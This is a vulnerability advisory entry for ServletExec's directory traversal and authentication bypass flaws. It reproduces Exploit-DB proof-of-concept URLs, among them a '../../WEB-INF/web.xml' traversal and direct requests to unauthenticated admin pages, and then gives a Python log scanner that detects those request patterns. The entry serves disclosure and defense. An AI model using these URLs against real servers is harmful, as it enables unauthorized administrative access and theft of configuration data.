Vendor: ServletExec
By:
CVSS: 7.5 (HIGH)
Directory Traversal and Authentication Bypass
CWE: 22
Product Name: ServletExec
Affected Version From:
Affected Version To: ServletExec versions prior to 6.0.0.2_39
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

ServletExec Directory Traversal and Authentication Bypass Vulnerabilities

The ServletExec application contains a directory traversal vulnerability and multiple authentication bypass vulnerabilities. They result from insufficient sanitization of user-supplied input. An attacker can exploit them to gain administrative access to the affected application and to retrieve sensitive information that aids further attacks.

Mitigation:

Upgrade to ServletExec 6.0.0.2_39 or later version.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/42411/info

ServletExec is prone to a directory-traversal vulnerability and multiple authentication-bypass vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

Exploiting these issues may allow an attacker to gain administrative access to the affected application and to obtain sensitive information that could aid in further attacks.

Versions prior to ServletExec 6.0.0.2_39 are vulnerable.

http://www.example.com/servlet/pagecompile._admin._help._helpContent_xjsp?page=../../WEB-INF/web.xml
http://www.example.com/servlet/pagecompile._admin._login_xjsp
http://www.example.com/servlet/pagecompile._admin._vmSystemProperties_xjsp
http://www.example.com/servlet/pagecompile._admin._SELogging_xjsp
http://www.example.com/servlet/pagecompile._admin._userMgt_xjsp
http://www.example.com/servlet/pagecompile._admin._virtualServers_xjsp
http://www.example.com/servlet/pagecompile._admin._optionalPackages_xjsp
http://www.example.com/servlet/pagecompile._admin._dataSources_xjsp
http://www.example.com/servlet/pagecompile._admin._debug_xjsp
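The request patterns above are what a defender would want to find in web-server logs while an upgrade is pending. The following is an added example (not part of the Exploit-DB record or of ServletExec) that scans Common Log Format access-log lines for two indicators drawn from the advisory: direct requests to the `/servlet/pagecompile._admin.` pages (the authentication-bypass path) and `..` segments in the `page` parameter or the path, after repeated URL decoding so single- and double-encoded traversal is caught. The log lines are constructed for the example; the log format and field names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2010:10:01:02 +0000] "GET /servlet/pagecompile._admin._help._helpContent_xjsp?page=../../WEB-INF/web.xml HTTP/1.1" 200 1532
10.0.0.5 - - [12/Aug/2010:10:01:05 +0000] "GET /servlet/pagecompile._admin._userMgt_xjsp HTTP/1.1" 200 8891
10.0.0.7 - - [12/Aug/2010:10:02:11 +0000] "GET /servlet/pagecompile._admin._help._helpContent_xjsp?page=%2e%2e%2f%2e%2e%2fWEB-INF%2fweb.xml HTTP/1.1" 200 1532
10.0.0.9 - - [12/Aug/2010:10:03:30 +0000] "GET /index.html HTTP/1.1" 200 512
10.0.0.9 - - [12/Aug/2010:10:03:31 +0000] "GET /servlet/pagecompile._admin._help._helpContent_xjsp?page=intro HTTP/1.1" 200 2210
"""

# Common Log Format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Pagecompile admin pages from the advisory are reachable without authentication.
ADMIN_PREFIX = "/servlet/pagecompile._admin."

# A ".." path segment bounded by / or \ (or string start/end).
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def fully_decode(value, max_rounds=3):
    """URL-decode repeatedly so double-encoded sequences (%252e) are also normalized."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def has_traversal(query):
    """True if any query-string value contains a '..' segment after decoding."""
    for _key, values in parse_qs(query, keep_blank_values=True).items():
        for v in values:
            if TRAVERSAL_RE.search(fully_decode(v)):
                return True
    return False


def classify(line):
    """Return a finding dict for a suspicious line, or None if it is benign/unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    path = fully_decode(parts.path)
    tags = []
    if path.startswith(ADMIN_PREFIX):
        tags.append("admin-pagecompile")
    if TRAVERSAL_RE.search(path) or has_traversal(parts.query):
        tags.append("traversal")
    if not tags:
        return None
    return {
        "ip": m.group("ip"),
        "path": parts.path,
        "status": int(m.group("status")),
        "tags": tags,
    }


def scan(log_text):
    """Run classify() over every line and collect the findings in order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], finding["status"], ",".join(finding["tags"]), finding["path"])
```

A 200 status on an `admin-pagecompile` hit from an address that never authenticated is the strongest signal; the `traversal` tag on the help-content page is the specific web.xml read described in the advisory. The decoder is bounded to three rounds so a log line cannot make the scanner loop.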